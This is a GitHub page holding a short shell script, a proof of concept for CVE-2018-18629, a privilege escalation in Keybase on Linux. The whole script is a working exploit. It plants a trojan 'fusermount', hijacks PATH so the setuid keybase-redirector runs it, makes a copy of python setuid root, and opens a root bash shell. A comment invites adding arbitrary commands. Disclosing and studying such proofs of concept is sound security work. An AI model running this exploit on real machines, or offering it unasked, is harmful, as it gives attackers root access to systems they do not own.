Permalink
Branch: master
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
25 lines (18 sloc) 567 Bytes
#!/bin/sh
# PoC for CVE-2018-18629 Keybase Linux Privilege Escalation
# Rich Mirch
# build fusermount trojan
# copy python to cwd and make it setuid
# Note: arbitrary commands can be added to this script
cat >fusermount<<EOF
#!/bin/sh
export PATH=/bin:/usr/bin:/sbin:/usr/sbin
cp `which python` woot
chmod 4755 woot
echo "woot" >/dev/tty
EOF
chmod 750 fusermount
env PATH=$PWD:$PATH keybase-redirector /keybase 2>&1 &
sleep 1 # one second should be enough time for fusermount call
./woot -c 'import os;os.setuid(0);os.system("/bin/bash")'
rm -f woot fusermount